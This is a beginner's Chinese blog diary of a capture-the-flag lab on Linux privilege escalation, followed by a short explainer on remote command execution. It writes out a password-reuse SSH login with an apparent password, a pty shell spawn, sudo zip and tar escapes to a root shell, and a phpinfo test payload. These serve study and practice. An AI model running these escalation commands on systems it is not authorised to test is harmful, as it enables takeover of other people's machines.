小白学习CTF第十一天-web安全提权

本文详细介绍了从www-data权限开始的Web安全提权过程,包括内核漏洞利用、明文root密码获取、计划任务利用、密码复用技巧、SSH远程登录、sudo权限提升等关键步骤。通过具体操作如配置文件挖掘、zip与tar命令的巧妙运用,最终实现权限提升并获取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

web安全提权

在这里插入图片描述

提权介绍

在这里插入图片描述
根据之前得到www-data权限,准备进行提权:
在这里插入图片描述

内核漏洞提权

在这里插入图片描述
在这里插入图片描述

明文root密码提权

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

计划任务

在这里插入图片描述

密码复用

在这里插入图片描述

sudo -l
cd /home
cd zico
ls -alh(发现ssh隐藏文件,wordpress)
cd wordpress(挖掘配置文件,发现wp-config.php)
cat wp-config.php(密码复用)
ssh zico@ip(远程登陆)
sWfCsfJSPV9H3AmQzw8
python -c "import pty;pty.spawn('/bin/bash')"
sudo -l(提权提示)

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
ssh如果出现类似的警告:使用后面的处理办法。
在这里插入图片描述
mv /root/.ssh/known_hosts /tmp在这里插入图片描述
之后再次使用ssh登陆即可正常使用了。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

//利用zip进行提权
touch exploit
sudo -u root zip exploit.zip exploit -T --unzip-command="sh -c /bin/bash"
//利用tar进行提权
sudo -u root tar cf /dev/null exploit -checkpoint=1 --checkpoint-action="/bin/bash"

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

获取flag

在这里插入图片描述

### CTFHUB Web 前置技能 RCE 挑战及解题思路 #### 远程命令执行简介 远程命令执行(Remote Command Execution, RCE),是指攻击者能够通过应用程序接口发送特定指令,在服务器端执行任意操作系统级别的命令。这种漏洞一旦被利用,可能导致整个系统的完全控制。 #### 发现潜在的RCE漏洞 当面对可能存在RCE漏洞的应用程序时,通常会寻找可以输入数据的地方,比如表单交、URL参数等位置。如果这些地方的数据未经严格验证就直接用于构建并执行系统调用,则可能成为RCE攻击的目标[^1]。 #### 验证是否存在RCE漏洞 为了确认是否真的存在这样的安全风险,可以通过尝试注入一些简单的测试语句来观察响应情况。例如,在支持PHP环境的情况下,可以试着向目标页面传递如下payload: ```php <?php phpinfo(); ?> ``` 如果上述代码被执行并且返回了PHP配置信息,则说明确实存在未受保护的入口点允许外部传入的内容影响到内部逻辑处理流程。 #### 利用已知条件构造有效载荷 假设经过初步探测之后发现了某个变量可以直接参与到shell_exec()函数之中去,那么就可以精心设计一段能实现预期目的同时又不会引起怀疑的日志记录脚本作为最终的有效负载。这里给出一个简单例子用来获取当前目录下的文件列表: ```bash ls -al ``` 当然实际操作过程中还需要考虑更多因素,如编码方式转换、特殊字符转义等问题以确保成功绕过防护机制达到想要的效果。 #### 安全建议 对于开发者而言,预防此类问题的发生至关重要。应当遵循最小限原则分配资源访问;对所有来自客户端的信息都应做充分校验过滤后再参与后续运算过程;定期审查源码查找安全隐患及时修复补丁版本更新至最新状态等等措施均有助于减少遭受恶意侵害的可能性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值